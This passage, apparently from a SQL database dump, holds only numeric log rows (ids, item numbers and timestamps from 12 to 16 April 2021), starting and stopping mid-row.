04:41:30'),(18683,2159,1,'2021-04-12','2021-04-12 06:00:44'),(18684,3282,1,'2021-04-12','2021-04-12 07:48:35'),(18685,2769,1,'2021-04-12','2021-04-12 08:12:13'),(18686,1608,1,'2021-04-12','2021-04-12 08:45:02'),(18687,1608,1,'2021-04-12','2021-04-12 08:45:03'),(18688,1608,1,'2021-04-12','2021-04-12 08:45:04'),(18689,1608,1,'2021-04-12','2021-04-12 08:53:11'),(18690,2704,1,'2021-04-12','2021-04-12 09:31:07'),(18691,1586,1,'2021-04-12','2021-04-12 09:33:51'),(18692,1600,1,'2021-04-12','2021-04-12 09:53:11'),(18693,1695,1,'2021-04-12','2021-04-12 10:02:48'),(18694,2457,1,'2021-04-12','2021-04-12 10:15:31'),(18695,2457,1,'2021-04-12','2021-04-12 10:15:56'),(18696,3102,1,'2021-04-12','2021-04-12 10:16:44'),(18697,3058,1,'2021-04-12','2021-04-12 10:23:21'),(18698,84,1,'2021-04-12','2021-04-12 10:30:29'),(18699,84,1,'2021-04-12','2021-04-12 10:31:20'),(18700,1600,1,'2021-04-12','2021-04-12 10:53:07'),(18701,3541,1,'2021-04-12','2021-04-12 11:34:35'),(18702,1602,1,'2021-04-12','2021-04-12 11:49:53'),(18703,1734,1,'2021-04-12','2021-04-12 11:50:57'),(18704,1602,1,'2021-04-12','2021-04-12 11:51:40'),(18705,1602,1,'2021-04-12','2021-04-12 12:07:59'),(18706,2503,1,'2021-04-12','2021-04-12 12:11:11'),(18707,3107,1,'2021-04-12','2021-04-12 12:13:52'),(18708,1588,1,'2021-04-12','2021-04-12 12:21:03'),(18709,1598,1,'2021-04-12','2021-04-12 12:24:04'),(18710,1608,1,'2021-04-12','2021-04-12 12:34:10'),(18711,1877,1,'2021-04-12','2021-04-12 13:20:02'),(18712,3253,1,'2021-04-12','2021-04-12 13:24:20'),(18713,84,1,'2021-04-12','2021-04-12 13:41:35'),(18714,84,1,'2021-04-12','2021-04-12 13:44:34'),(18715,84,1,'2021-04-12','2021-04-12 13:48:38'),(18716,87,1,'2021-04-12','2021-04-12 13:53:52'),(18717,84,1,'2021-04-12','2021-04-12 13:54:14'),(18718,2904,1,'2021-04-12','2021-04-12 13:54:15'),(18719,2309,1,'2021-04-12','2021-04-12 13:54:32'),(18720,1608,1,'2021-04-12','2021-04-12 13:55:44'),(18721,1608,1,'2021-04-12','2021-04-12 13:57:12'),(18722,2904,1,'2021-04-12','2021-04-12 13:57:42'),(18723,1582,1,'2021-04-12','2021-04-12 14:05:18'),(18724,1598,1,'2021-04-12','2021-04-12 14:22:49'),(18725,1602,1,'2021-04-12','2021-04-12 14:24:00'),(18726,1602,1,'2021-04-12','2021-04-12 14:24:49'),(18727,3253,1,'2021-04-12','2021-04-12 14:25:26'),(18728,1598,1,'2021-04-12','2021-04-12 14:27:36'),(18729,476,1,'2021-04-12','2021-04-12 14:34:42'),(18730,1602,1,'2021-04-12','2021-04-12 14:37:31'),(18731,1588,1,'2021-04-12','2021-04-12 14:38:17'),(18732,2751,1,'2021-04-12','2021-04-12 15:45:45'),(18733,2769,1,'2021-04-12','2021-04-12 15:48:13'),(18734,3489,1,'2021-04-12','2021-04-12 16:29:04'),(18735,2159,1,'2021-04-12','2021-04-12 16:44:28'),(18736,2159,1,'2021-04-12','2021-04-12 17:14:33'),(18737,1870,1,'2021-04-12','2021-04-12 17:25:54'),(18738,2609,1,'2021-04-12','2021-04-12 17:27:55'),(18739,1608,1,'2021-04-12','2021-04-12 17:35:44'),(18740,2769,1,'2021-04-12','2021-04-12 17:36:02'),(18741,1728,1,'2021-04-12','2021-04-12 17:39:14'),(18742,1586,1,'2021-04-12','2021-04-12 18:20:22'),(18743,1726,1,'2021-04-12','2021-04-12 18:31:28'),(18744,1608,1,'2021-04-12','2021-04-12 18:34:21'),(18745,1586,1,'2021-04-12','2021-04-12 18:36:12'),(18746,1726,1,'2021-04-12','2021-04-12 19:01:30'),(18747,470,1,'2021-04-12','2021-04-12 19:26:34'),(18748,1594,1,'2021-04-12','2021-04-12 19:30:51'),(18749,91,1,'2021-04-12','2021-04-12 19:31:31'),(18750,1594,1,'2021-04-12','2021-04-12 19:31:44'),(18751,1582,1,'2021-04-12','2021-04-12 19:35:26'),(18752,1751,1,'2021-04-12','2021-04-12 19:37:19'),(18753,108,1,'2021-04-12','2021-04-12 19:46:26'),(18754,3664,1,'2021-04-12','2021-04-12 20:22:56'),(18755,486,1,'2021-04-12','2021-04-12 20:31:47'),(18756,1608,1,'2021-04-12','2021-04-12 21:04:48'),(18757,1695,1,'2021-04-12','2021-04-12 21:34:50'),(18758,3058,1,'2021-04-12','2021-04-12 21:42:28'),(18759,3269,1,'2021-04-12','2021-04-12 22:02:28'),(18760,1695,1,'2021-04-12','2021-04-12 22:05:04'),(18761,3282,1,'2021-04-12','2021-04-12 22:35:00'),(18762,3290,1,'2021-04-12','2021-04-12 22:42:15'),(18763,1586,1,'2021-04-12','2021-04-12 22:52:24'),(18764,2769,1,'2021-04-12','2021-04-12 23:03:46'),(18765,2769,1,'2021-04-12','2021-04-12 23:04:38'),(18766,1614,1,'2021-04-12','2021-04-12 23:19:48'),(18767,3282,1,'2021-04-12','2021-04-12 23:31:39'),(18768,1608,1,'2021-04-13','2021-04-13 00:01:43'),(18769,3290,1,'2021-04-13','2021-04-13 00:02:46'),(18770,1600,1,'2021-04-13','2021-04-13 01:32:47'),(18771,2309,1,'2021-04-13','2021-04-13 01:42:39'),(18772,1602,1,'2021-04-13','2021-04-13 02:43:16'),(18773,1586,1,'2021-04-13','2021-04-13 04:02:55'),(18774,1608,1,'2021-04-13','2021-04-13 04:34:43'),(18775,1709,1,'2021-04-13','2021-04-13 04:43:04'),(18776,470,1,'2021-04-13','2021-04-13 05:13:22'),(18777,2751,1,'2021-04-13','2021-04-13 05:33:23'),(18778,1588,1,'2021-04-13','2021-04-13 06:03:46'),(18779,473,1,'2021-04-13','2021-04-13 06:23:52'),(18780,1586,1,'2021-04-13','2021-04-13 06:38:40'),(18781,2775,1,'2021-04-13','2021-04-13 06:43:33'),(18782,470,1,'2021-04-13','2021-04-13 06:53:51'),(18783,80,1,'2021-04-13','2021-04-13 07:21:19'),(18784,3489,1,'2021-04-13','2021-04-13 07:24:13'),(18785,468,1,'2021-04-13','2021-04-13 07:34:07'),(18786,1604,1,'2021-04-13','2021-04-13 07:53:54'),(18787,3282,1,'2021-04-13','2021-04-13 08:17:50'),(18788,1747,1,'2021-04-13','2021-04-13 08:23:54'),(18789,3290,1,'2021-04-13','2021-04-13 08:43:56'),(18790,2704,1,'2021-04-13','2021-04-13 08:53:49'),(18791,3104,1,'2021-04-13','2021-04-13 09:04:06'),(18792,2769,1,'2021-04-13','2021-04-13 09:14:06'),(18793,2309,1,'2021-04-13','2021-04-13 09:54:24'),(18794,1749,1,'2021-04-13','2021-04-13 10:14:44'),(18795,1774,1,'2021-04-13','2021-04-13 10:15:59'),(18796,1774,1,'2021-04-13','2021-04-13 10:19:53'),(18797,1598,1,'2021-04-13','2021-04-13 10:25:09'),(18798,3313,1,'2021-04-13','2021-04-13 10:35:04'),(18799,1726,1,'2021-04-13','2021-04-13 10:41:50'),(18800,1614,1,'2021-04-13','2021-04-13 10:54:21'),(18801,472,1,'2021-04-13','2021-04-13 11:14:49'),(18802,1711,1,'2021-04-13','2021-04-13 11:24:47'),(18803,2809,1,'2021-04-13','2021-04-13 11:34:46'),(18804,1718,1,'2021-04-13','2021-04-13 12:24:33'),(18805,1600,1,'2021-04-13','2021-04-13 12:31:28'),(18806,1600,1,'2021-04-13','2021-04-13 12:31:31'),(18807,1600,1,'2021-04-13','2021-04-13 12:34:36'),(18808,2934,1,'2021-04-13','2021-04-13 12:44:34'),(18809,1544,1,'2021-04-13','2021-04-13 12:44:42'),(18810,2309,1,'2021-04-13','2021-04-13 13:06:26'),(18811,74,1,'2021-04-13','2021-04-13 13:22:21'),(18812,2297,1,'2021-04-13','2021-04-13 13:23:52'),(18813,1590,1,'2021-04-13','2021-04-13 13:25:08'),(18814,487,1,'2021-04-13','2021-04-13 13:32:35'),(18815,1604,1,'2021-04-13','2021-04-13 13:34:48'),(18816,1582,1,'2021-04-13','2021-04-13 13:36:22'),(18817,471,1,'2021-04-13','2021-04-13 13:37:22'),(18818,467,1,'2021-04-13','2021-04-13 13:44:45'),(18819,1718,1,'2021-04-13','2021-04-13 13:47:11'),(18820,1606,1,'2021-04-13','2021-04-13 13:54:46'),(18821,1604,1,'2021-04-13','2021-04-13 13:59:29'),(18822,1594,1,'2021-04-13','2021-04-13 14:15:00'),(18823,1718,1,'2021-04-13','2021-04-13 14:19:34'),(18824,1766,1,'2021-04-13','2021-04-13 14:24:55'),(18825,3030,1,'2021-04-13','2021-04-13 14:30:58'),(18826,1596,1,'2021-04-13','2021-04-13 14:34:47'),(18827,2751,1,'2021-04-13','2021-04-13 14:55:08'),(18828,1718,1,'2021-04-13','2021-04-13 15:00:18'),(18829,1588,1,'2021-04-13','2021-04-13 15:05:05'),(18830,1598,1,'2021-04-13','2021-04-13 15:09:28'),(18831,68,1,'2021-04-13','2021-04-13 15:16:48'),(18832,3045,1,'2021-04-13','2021-04-13 15:25:13'),(18833,1544,1,'2021-04-13','2021-04-13 15:25:17'),(18834,1588,1,'2021-04-13','2021-04-13 15:35:17'),(18835,2490,1,'2021-04-13','2021-04-13 15:45:23'),(18836,1718,1,'2021-04-13','2021-04-13 15:47:39'),(18837,68,1,'2021-04-13','2021-04-13 15:58:54'),(18838,2704,1,'2021-04-13','2021-04-13 16:01:32'),(18839,1718,1,'2021-04-13','2021-04-13 16:20:58'),(18840,2420,1,'2021-04-13','2021-04-13 16:34:20'),(18841,1614,1,'2021-04-13','2021-04-13 16:52:32'),(18842,1594,1,'2021-04-13','2021-04-13 17:18:31'),(18843,3282,1,'2021-04-13','2021-04-13 17:44:28'),(18844,74,1,'2021-04-13','2021-04-13 18:04:55'),(18845,1594,1,'2021-04-13','2021-04-13 18:05:39'),(18846,3282,1,'2021-04-13','2021-04-13 18:14:28'),(18847,1592,1,'2021-04-13','2021-04-13 18:22:14'),(18848,2704,1,'2021-04-13','2021-04-13 18:25:57'),(18849,1592,1,'2021-04-13','2021-04-13 18:32:33'),(18850,3257,1,'2021-04-13','2021-04-13 18:36:04'),(18851,1695,1,'2021-04-13','2021-04-13 18:44:29'),(18852,1586,1,'2021-04-13','2021-04-13 19:32:59'),(18853,1586,1,'2021-04-13','2021-04-13 19:33:41'),(18854,1695,1,'2021-04-13','2021-04-13 20:14:30'),(18855,2309,1,'2021-04-13','2021-04-13 20:16:24'),(18856,1718,1,'2021-04-13','2021-04-13 20:25:18'),(18857,1586,1,'2021-04-13','2021-04-13 20:25:52'),(18858,1602,1,'2021-04-13','2021-04-13 20:27:28'),(18859,2309,1,'2021-04-13','2021-04-13 20:36:23'),(18860,1602,1,'2021-04-13','2021-04-13 21:14:13'),(18861,1544,1,'2021-04-13','2021-04-13 21:14:55'),(18862,3041,1,'2021-04-13','2021-04-13 21:15:36'),(18863,483,1,'2021-04-13','2021-04-13 21:37:05'),(18864,1598,1,'2021-04-13','2021-04-13 21:48:18'),(18865,2609,1,'2021-04-13','2021-04-13 22:07:03'),(18866,2769,1,'2021-04-13','2021-04-13 22:38:13'),(18867,2769,1,'2021-04-13','2021-04-13 22:38:15'),(18868,2769,1,'2021-04-13','2021-04-13 22:38:23'),(18869,2911,1,'2021-04-13','2021-04-13 22:46:52'),(18870,3030,1,'2021-04-13','2021-04-13 22:48:27'),(18871,2395,1,'2021-04-13','2021-04-13 23:07:03'),(18872,1586,1,'2021-04-13','2021-04-13 23:32:53'),(18873,1586,1,'2021-04-13','2021-04-13 23:32:58'),(18874,570,1,'2021-04-13','2021-04-13 23:47:11'),(18875,1598,1,'2021-04-13','2021-04-13 23:52:28'),(18876,1586,1,'2021-04-13','2021-04-13 23:53:07'),(18877,1586,1,'2021-04-13','2021-04-13 23:53:28'),(18878,1699,1,'2021-04-13','2021-04-13 23:56:20'),(18879,1614,1,'2021-04-14','2021-04-14 00:09:11'),(18880,1718,1,'2021-04-14','2021-04-14 00:10:30'),(18881,1718,1,'2021-04-14','2021-04-14 00:10:31'),(18882,1718,1,'2021-04-14','2021-04-14 00:11:34'),(18883,1586,1,'2021-04-14','2021-04-14 00:15:39'),(18884,2801,1,'2021-04-14','2021-04-14 00:27:15'),(18885,1718,1,'2021-04-14','2021-04-14 00:42:00'),(18886,1718,1,'2021-04-14','2021-04-14 00:45:12'),(18887,1718,1,'2021-04-14','2021-04-14 00:45:14'),(18888,108,1,'2021-04-14','2021-04-14 00:48:36'),(18889,1600,1,'2021-04-14','2021-04-14 00:50:53'),(18890,1602,1,'2021-04-14','2021-04-14 00:52:02'),(18891,1602,1,'2021-04-14','2021-04-14 00:52:13'),(18892,68,1,'2021-04-14','2021-04-14 00:53:06'),(18893,2309,1,'2021-04-14','2021-04-14 01:07:41'),(18894,1718,1,'2021-04-14','2021-04-14 01:32:05'),(18895,1602,1,'2021-04-14','2021-04-14 01:34:02'),(18896,1718,1,'2021-04-14','2021-04-14 01:34:54'),(18897,1718,1,'2021-04-14','2021-04-14 01:34:55'),(18898,1718,1,'2021-04-14','2021-04-14 01:37:29'),(18899,108,1,'2021-04-14','2021-04-14 01:59:30'),(18900,84,1,'2021-04-14','2021-04-14 02:06:45'),(18901,3041,1,'2021-04-14','2021-04-14 02:12:20'),(18902,486,1,'2021-04-14','2021-04-14 02:20:03'),(18903,1608,1,'2021-04-14','2021-04-14 02:22:50'),(18904,1594,1,'2021-04-14','2021-04-14 02:25:52'),(18905,1608,1,'2021-04-14','2021-04-14 02:28:31'),(18906,1600,1,'2021-04-14','2021-04-14 02:29:15'),(18907,1582,1,'2021-04-14','2021-04-14 02:36:48'),(18908,486,1,'2021-04-14','2021-04-14 02:40:19'),(18909,470,1,'2021-04-14','2021-04-14 02:46:03'),(18910,80,1,'2021-04-14','2021-04-14 02:46:51'),(18911,3273,1,'2021-04-14','2021-04-14 02:47:03'),(18912,2769,1,'2021-04-14','2021-04-14 03:07:17'),(18913,1544,1,'2021-04-14','2021-04-14 03:08:00'),(18914,1600,1,'2021-04-14','2021-04-14 03:17:45'),(18915,470,1,'2021-04-14','2021-04-14 03:28:42'),(18916,2410,1,'2021-04-14','2021-04-14 03:37:19'),(18917,1598,1,'2021-04-14','2021-04-14 03:57:38'),(18918,1594,1,'2021-04-14','2021-04-14 04:04:45'),(18919,1594,1,'2021-04-14','2021-04-14 04:04:46'),(18920,1602,1,'2021-04-14','2021-04-14 04:15:04'),(18921,1594,1,'2021-04-14','2021-04-14 04:23:46'),(18922,1602,1,'2021-04-14','2021-04-14 04:24:29'),(18923,477,1,'2021-04-14','2021-04-14 04:38:15'),(18924,1614,1,'2021-04-14','2021-04-14 04:40:38'),(18925,477,1,'2021-04-14','2021-04-14 04:46:55'),(18926,1718,1,'2021-04-14','2021-04-14 04:59:34'),(18927,2309,1,'2021-04-14','2021-04-14 05:08:18'),(18928,2309,1,'2021-04-14','2021-04-14 05:29:11'),(18929,1592,1,'2021-04-14','2021-04-14 05:48:08'),(18930,68,1,'2021-04-14','2021-04-14 06:01:36'),(18931,1718,1,'2021-04-14','2021-04-14 06:34:02'),(18932,1718,1,'2021-04-14','2021-04-14 06:34:02'),(18933,1582,1,'2021-04-14','2021-04-14 06:48:53'),(18934,2769,1,'2021-04-14','2021-04-14 06:53:35'),(18935,2813,1,'2021-04-14','2021-04-14 06:58:56'),(18936,3297,1,'2021-04-14','2021-04-14 07:09:04'),(18937,1598,1,'2021-04-14','2021-04-14 07:42:32'),(18938,1598,1,'2021-04-14','2021-04-14 07:45:09'),(18939,1604,1,'2021-04-14','2021-04-14 07:48:38'),(18940,1612,1,'2021-04-14','2021-04-14 08:04:33'),(18941,80,1,'2021-04-14','2021-04-14 08:05:43'),(18942,68,1,'2021-04-14','2021-04-14 08:06:46'),(18943,3005,1,'2021-04-14','2021-04-14 08:09:07'),(18944,2617,1,'2021-04-14','2021-04-14 08:09:39'),(18945,1598,1,'2021-04-14','2021-04-14 08:11:57'),(18946,3034,1,'2021-04-14','2021-04-14 08:19:15'),(18947,2658,1,'2021-04-14','2021-04-14 08:29:14'),(18948,2309,1,'2021-04-14','2021-04-14 08:40:26'),(18949,1594,1,'2021-04-14','2021-04-14 08:45:18'),(18950,570,1,'2021-04-14','2021-04-14 08:59:26'),(18951,1594,1,'2021-04-14','2021-04-14 10:02:13'),(18952,1751,1,'2021-04-14','2021-04-14 10:06:50'),(18953,3038,1,'2021-04-14','2021-04-14 10:21:07'),(18954,2420,1,'2021-04-14','2021-04-14 10:40:13'),(18955,2769,1,'2021-04-14','2021-04-14 10:40:15'),(18956,2769,1,'2021-04-14','2021-04-14 10:40:17'),(18957,2769,1,'2021-04-14','2021-04-14 10:48:44'),(18958,1598,1,'2021-04-14','2021-04-14 11:11:50'),(18959,1606,1,'2021-04-14','2021-04-14 11:18:22'),(18960,80,1,'2021-04-14','2021-04-14 11:18:37'),(18961,1606,1,'2021-04-14','2021-04-14 11:19:31'),(18962,570,1,'2021-04-14','2021-04-14 11:48:03'),(18963,1600,1,'2021-04-14','2021-04-14 12:11:18'),(18964,1606,1,'2021-04-14','2021-04-14 12:16:44'),(18965,1604,1,'2021-04-14','2021-04-14 12:22:17'),(18966,2769,1,'2021-04-14','2021-04-14 12:41:25'),(18967,3102,1,'2021-04-14','2021-04-14 13:00:25'),(18968,1718,1,'2021-04-14','2021-04-14 13:02:40'),(18969,1594,1,'2021-04-14','2021-04-14 13:08:20'),(18970,2965,1,'2021-04-14','2021-04-14 13:21:16'),(18971,2965,1,'2021-04-14','2021-04-14 13:37:08'),(18972,2964,1,'2021-04-14','2021-04-14 13:41:35'),(18973,1544,1,'2021-04-14','2021-04-14 13:41:37'),(18974,2309,1,'2021-04-14','2021-04-14 14:42:06'),(18975,477,1,'2021-04-14','2021-04-14 14:43:03'),(18976,1606,1,'2021-04-14','2021-04-14 15:10:31'),(18977,2617,1,'2021-04-14','2021-04-14 15:43:26'),(18978,2617,1,'2021-04-14','2021-04-14 15:43:45'),(18979,2813,1,'2021-04-14','2021-04-14 16:09:59'),(18980,2813,1,'2021-04-14','2021-04-14 16:10:00'),(18981,89,1,'2021-04-14','2021-04-14 16:11:55'),(18982,1604,1,'2021-04-14','2021-04-14 16:52:14'),(18983,2309,1,'2021-04-14','2021-04-14 16:57:37'),(18984,1596,1,'2021-04-14','2021-04-14 17:08:54'),(18985,108,1,'2021-04-14','2021-04-14 17:09:31'),(18986,467,1,'2021-04-14','2021-04-14 17:12:13'),(18987,3034,1,'2021-04-14','2021-04-14 17:22:25'),(18988,1606,1,'2021-04-14','2021-04-14 17:32:14'),(18989,108,1,'2021-04-14','2021-04-14 17:37:35'),(18990,1614,1,'2021-04-14','2021-04-14 17:46:05'),(18991,80,1,'2021-04-14','2021-04-14 18:02:50'),(18992,74,1,'2021-04-14','2021-04-14 18:09:15'),(18993,1612,1,'2021-04-14','2021-04-14 18:27:16'),(18994,570,1,'2021-04-14','2021-04-14 18:33:23'),(18995,3482,1,'2021-04-14','2021-04-14 19:21:25'),(18996,3430,1,'2021-04-14','2021-04-14 19:26:15'),(18997,3531,1,'2021-04-14','2021-04-14 19:28:57'),(18998,3482,1,'2021-04-14','2021-04-14 19:32:08'),(18999,1602,1,'2021-04-14','2021-04-14 19:36:47'),(19000,3038,1,'2021-04-14','2021-04-14 19:57:48'),(19001,2804,1,'2021-04-14','2021-04-14 20:02:57'),(19002,1718,1,'2021-04-14','2021-04-14 20:13:11'),(19003,3430,1,'2021-04-14','2021-04-14 20:27:10'),(19004,3316,1,'2021-04-14','2021-04-14 20:27:14'),(19005,3438,1,'2021-04-14','2021-04-14 20:27:19'),(19006,2769,1,'2021-04-14','2021-04-14 20:28:37'),(19007,2769,1,'2021-04-14','2021-04-14 20:28:41'),(19008,1588,1,'2021-04-14','2021-04-14 20:37:31'),(19009,1582,1,'2021-04-14','2021-04-14 20:44:07'),(19010,3486,1,'2021-04-14','2021-04-14 20:54:09'),(19011,2769,1,'2021-04-14','2021-04-14 21:14:37'),(19012,468,1,'2021-04-14','2021-04-14 21:15:20'),(19013,80,1,'2021-04-14','2021-04-14 22:03:36'),(19014,2617,1,'2021-04-14','2021-04-14 22:05:23'),(19015,3282,1,'2021-04-14','2021-04-14 22:25:44'),(19016,1594,1,'2021-04-14','2021-04-14 22:49:57'),(19017,1594,1,'2021-04-14','2021-04-14 22:50:12'),(19018,1608,1,'2021-04-14','2021-04-14 22:55:46'),(19019,1586,1,'2021-04-14','2021-04-14 23:08:20'),(19020,1586,1,'2021-04-14','2021-04-14 23:08:21'),(19021,1586,1,'2021-04-14','2021-04-14 23:08:27'),(19022,1602,1,'2021-04-14','2021-04-14 23:23:00'),(19023,80,1,'2021-04-14','2021-04-14 23:23:21'),(19024,3282,1,'2021-04-14','2021-04-14 23:25:43'),(19025,1602,1,'2021-04-14','2021-04-14 23:27:19'),(19026,2704,1,'2021-04-14','2021-04-14 23:41:58'),(19027,1695,1,'2021-04-14','2021-04-14 23:55:45'),(19028,2309,1,'2021-04-15','2021-04-15 00:11:33'),(19029,80,1,'2021-04-15','2021-04-15 02:01:24'),(19030,1596,1,'2021-04-15','2021-04-15 02:24:23'),(19031,108,1,'2021-04-15','2021-04-15 02:27:19'),(19032,1596,1,'2021-04-15','2021-04-15 02:27:29'),(19033,2309,1,'2021-04-15','2021-04-15 02:43:52'),(19034,1606,1,'2021-04-15','2021-04-15 03:10:00'),(19035,1586,1,'2021-04-15','2021-04-15 03:19:18'),(19036,1586,1,'2021-04-15','2021-04-15 03:22:03'),(19037,3531,1,'2021-04-15','2021-04-15 03:24:20'),(19038,2989,1,'2021-04-15','2021-04-15 03:27:10'),(19039,1586,1,'2021-04-15','2021-04-15 03:34:43'),(19040,3060,1,'2021-04-15','2021-04-15 03:44:19'),(19041,3041,1,'2021-04-15','2021-04-15 04:01:29'),(19042,1586,1,'2021-04-15','2021-04-15 04:24:28'),(19043,2420,1,'2021-04-15','2021-04-15 05:24:22'),(19044,2309,1,'2021-04-15','2021-04-15 05:31:53'),(19045,570,1,'2021-04-15','2021-04-15 06:14:06'),(19046,1600,1,'2021-04-15','2021-04-15 06:20:07'),(19047,472,1,'2021-04-15','2021-04-15 06:21:40'),(19048,2813,1,'2021-04-15','2021-04-15 06:23:57'),(19049,3107,1,'2021-04-15','2021-04-15 06:28:50'),(19050,2410,1,'2021-04-15','2021-04-15 06:32:12'),(19051,2804,1,'2021-04-15','2021-04-15 06:52:28'),(19052,2769,1,'2021-04-15','2021-04-15 06:53:55'),(19053,472,1,'2021-04-15','2021-04-15 06:57:33'),(19054,2617,1,'2021-04-15','2021-04-15 06:59:06'),(19055,2309,1,'2021-04-15','2021-04-15 07:08:30'),(19056,1600,1,'2021-04-15','2021-04-15 07:43:57'),(19057,2309,1,'2021-04-15','2021-04-15 07:54:41'),(19058,2410,1,'2021-04-15','2021-04-15 08:41:01'),(19059,2769,1,'2021-04-15','2021-04-15 08:48:47'),(19060,68,1,'2021-04-15','2021-04-15 08:49:20'),(19061,68,1,'2021-04-15','2021-04-15 08:56:41'),(19062,68,1,'2021-04-15','2021-04-15 08:56:47'),(19063,2609,1,'2021-04-15','2021-04-15 09:24:20'),(19064,2503,1,'2021-04-15','2021-04-15 09:43:02'),(19065,2309,1,'2021-04-15','2021-04-15 09:53:56'),(19066,2971,1,'2021-04-15','2021-04-15 10:10:25'),(19067,3109,1,'2021-04-15','2021-04-15 10:15:15'),(19068,1728,1,'2021-04-15','2021-04-15 10:23:51'),(19069,1610,1,'2021-04-15','2021-04-15 10:24:06'),(19070,84,1,'2021-04-15','2021-04-15 10:25:35'),(19071,3534,1,'2021-04-15','2021-04-15 10:27:19'),(19072,3038,1,'2021-04-15','2021-04-15 10:27:45'),(19073,1586,1,'2021-04-15','2021-04-15 10:29:01'),(19074,1586,1,'2021-04-15','2021-04-15 10:29:01'),(19075,2617,1,'2021-04-15','2021-04-15 10:38:13'),(19076,2617,1,'2021-04-15','2021-04-15 10:38:13'),(19077,2150,1,'2021-04-15','2021-04-15 10:39:58'),(19078,1586,1,'2021-04-15','2021-04-15 10:41:08'),(19079,2178,1,'2021-04-15','2021-04-15 11:04:04'),(19080,3083,1,'2021-04-15','2021-04-15 11:14:43'),(19081,2309,1,'2021-04-15','2021-04-15 11:30:49'),(19082,2801,1,'2021-04-15','2021-04-15 11:31:59'),(19083,3038,1,'2021-04-15','2021-04-15 11:33:20'),(19084,2956,1,'2021-04-15','2021-04-15 11:33:47'),(19085,3038,1,'2021-04-15','2021-04-15 11:35:26'),(19086,3534,1,'2021-04-15','2021-04-15 11:35:30'),(19087,72,1,'2021-04-15','2021-04-15 11:36:49'),(19088,3489,1,'2021-04-15','2021-04-15 11:39:18'),(19089,3038,1,'2021-04-15','2021-04-15 11:51:08'),(19090,1608,1,'2021-04-15','2021-04-15 12:03:12'),(19091,1586,1,'2021-04-15','2021-04-15 12:20:51'),(19092,3087,1,'2021-04-15','2021-04-15 12:23:41'),(19093,3243,1,'2021-04-15','2021-04-15 12:27:15'),(19094,3282,1,'2021-04-15','2021-04-15 12:48:44'),(19095,1614,1,'2021-04-15','2021-04-15 12:51:09'),(19096,3282,1,'2021-04-15','2021-04-15 12:51:31'),(19097,68,1,'2021-04-15','2021-04-15 13:04:07'),(19098,1608,1,'2021-04-15','2021-04-15 13:06:49'),(19099,2503,1,'2021-04-15','2021-04-15 13:11:35'),(19100,1612,1,'2021-04-15','2021-04-15 13:16:35'),(19101,1612,1,'2021-04-15','2021-04-15 13:25:17'),(19102,2748,1,'2021-04-15','2021-04-15 13:26:05'),(19103,2617,1,'2021-04-15','2021-04-15 13:27:53'),(19104,2748,1,'2021-04-15','2021-04-15 13:29:14'),(19105,1612,1,'2021-04-15','2021-04-15 13:29:32'),(19106,3045,1,'2021-04-15','2021-04-15 13:43:11'),(19107,3265,1,'2021-04-15','2021-04-15 14:57:27'),(19108,1586,1,'2021-04-15','2021-04-15 15:19:26'),(19109,1586,1,'2021-04-15','2021-04-15 15:19:27'),(19110,1586,1,'2021-04-15','2021-04-15 15:19:30'),(19111,2457,1,'2021-04-15','2021-04-15 15:57:27'),(19112,2769,1,'2021-04-15','2021-04-15 16:07:30'),(19113,68,1,'2021-04-15','2021-04-15 16:17:08'),(19114,570,1,'2021-04-15','2021-04-15 16:17:52'),(19115,2971,1,'2021-04-15','2021-04-15 16:55:18'),(19116,1600,1,'2021-04-15','2021-04-15 17:08:12'),(19117,1586,1,'2021-04-15','2021-04-15 17:18:09'),(19118,1602,1,'2021-04-15','2021-04-15 17:28:16'),(19119,1594,1,'2021-04-15','2021-04-15 18:22:59'),(19120,1592,1,'2021-04-15','2021-04-15 18:54:51'),(19121,1592,1,'2021-04-15','2021-04-15 19:03:39'),(19122,472,1,'2021-04-15','2021-04-15 19:09:35'),(19123,1598,1,'2021-04-15','2021-04-15 19:29:26'),(19124,1586,1,'2021-04-15','2021-04-15 20:38:04'),(19125,1586,1,'2021-04-15','2021-04-15 20:38:04'),(19126,1586,1,'2021-04-15','2021-04-15 20:38:35'),(19127,1586,1,'2021-04-15','2021-04-15 20:38:49'),(19128,1608,1,'2021-04-15','2021-04-15 20:39:29'),(19129,1600,1,'2021-04-15','2021-04-15 20:40:02'),(19130,1586,1,'2021-04-15','2021-04-15 21:03:34'),(19131,3282,1,'2021-04-15','2021-04-15 21:38:28'),(19132,1586,1,'2021-04-15','2021-04-15 21:42:46'),(19133,1586,1,'2021-04-15','2021-04-15 21:42:48'),(19134,1586,1,'2021-04-15','2021-04-15 21:43:11'),(19135,2617,1,'2021-04-15','2021-04-15 21:43:48'),(19136,1586,1,'2021-04-15','2021-04-15 21:45:23'),(19137,1586,1,'2021-04-15','2021-04-15 21:47:25'),(19138,1586,1,'2021-04-15','2021-04-15 21:48:17'),(19139,2617,1,'2021-04-15','2021-04-15 22:01:06'),(19140,1592,1,'2021-04-15','2021-04-15 22:02:32'),(19141,1586,1,'2021-04-15','2021-04-15 22:02:48'),(19142,2617,1,'2021-04-15','2021-04-15 22:03:01'),(19143,1608,1,'2021-04-15','2021-04-15 22:13:30'),(19144,3030,1,'2021-04-15','2021-04-15 22:37:05'),(19145,1586,1,'2021-04-15','2021-04-15 23:03:32'),(19146,1586,1,'2021-04-15','2021-04-15 23:13:59'),(19147,1586,1,'2021-04-15','2021-04-15 23:14:00'),(19148,1586,1,'2021-04-15','2021-04-15 23:14:02'),(19149,2989,1,'2021-04-16','2021-04-16 00:02:42'),(19150,2248,1,'2021-04-16','2021-04-16 01:21:20'),(19151,2457,1,'2021-04-16','2021-04-16 02:06:08'),(19152,2457,1,'2021-04-16','2021-04-16 02:44:03'),(19153,2971,1,'2021-04-16','2021-04-16 03:29:02'),(19154,68,1,'2021-04-16','2021-04-16 03:40:12'),(19155,2161,1,'2021-04-16','2021-04-16 04:13:34'),(19156,1608,1,'2021-04-16','2021-04-16 06:18:17'),(19157,1718,1,'2021-04-16','2021-04-16 06:41:33'),(19158,2769,1,'2021-04-16','2021-04-16 06:43:21'),(19159,1608,1,'2021-04-16','2021-04-16 07:18:19'),(19160,1586,1,'2021-04-16','2021-04-16 08:00:43'),(19161,2704,1,'2021-04-16','2021-04-16 08:02:53'),(19162,1586,1,'2021-04-16','2021-04-16 08:15:23'),(19163,1608,1,'2021-04-16','2021-04-16 08:18:20'),(19164,1594,1,'2021-04-16','2021-04-16 08:34:28'),(19165,1594,1,'2021-04-16','2021-04-16 08:34:44'),(19166,2457,1,'2021-04-16','2021-04-16 08:37:05'),(19167,3045,1,'2021-04-16','2021-04-16 09:15:02'),(19168,1592,1,'2021-04-16','2021-04-16 